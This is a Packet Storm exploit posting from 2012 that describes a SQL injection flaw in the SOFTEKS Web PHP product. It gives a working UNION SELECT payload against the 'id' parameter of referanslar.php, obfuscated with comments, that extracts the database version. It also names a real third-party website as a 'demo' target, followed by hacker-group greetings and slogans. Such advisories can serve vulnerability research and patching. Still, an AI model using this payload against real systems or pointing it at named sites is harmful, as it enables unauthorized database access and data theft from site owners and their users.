SOFTEKS Web SQL Injection

2012-03-04T00:00:00
ID PACKETSTORM:110429
Type packetstorm
Reporter Th4 MasK
Modified 2012-03-04T00:00:00

Description

                                        
                                            `  
########################################################  
  
~ Exploit Title: * SOFTEKS Web SQL Injection *~   
  
~ Author: Th4 MasK   
  
~ Contact to ; th4_mask@windowslive.com ~  
  
~ Vendor : http://www.e-eks.com/  
  
~ Date : 04.03.2012 ~   
  
~ Platform : Php ~  
  
  
########################################################  
  
~ Demos Site :  
  
~ http://www.hakanreklam.com.tr/referanslar.php?id=15'a  
  
~ Exloit   
http://localhost/referanslar.php?id=[id]/**/AND/**/1=0/**/UNION/**/ALL/**/SELECT/**/1,/**/2,/**/3,/**/4,/**/5,/**/6,/**/7,/**/8,/**/9,/**/10,/**/11,/**/12,/**/13,/**/14,/**/15,/**/16,/**/17,/**/18,/**/19,/**/20,/**/@@version,/**/22,/**/23,/**/24,/**/25,/**/26,/**/27,/**/28,/**/29--  
#######################################################  
  
~* Virüslerden Önce Akil Var.   
  
########################################################  
  
~* Bilinmezlik DiyarinDan  
  
########################################################  
  
~* Ne Kadar Efendi OLursa Ol, HAyat O Kadar Züppe  
  
########################################################  
  
~* Olmassa Olmazimdir. Bazi seyler.  
  
########################################################  
  
~* Email:th4_mask@windowslive.com~   
  
~ Greetz: http://th4mask.blogspot.com ~ DarkDevilZ.iN  
########################################################  
  
~ Darkness Devil,DeaDSLayeR,MuHuR,Evillord  
  
########################################################   
  
`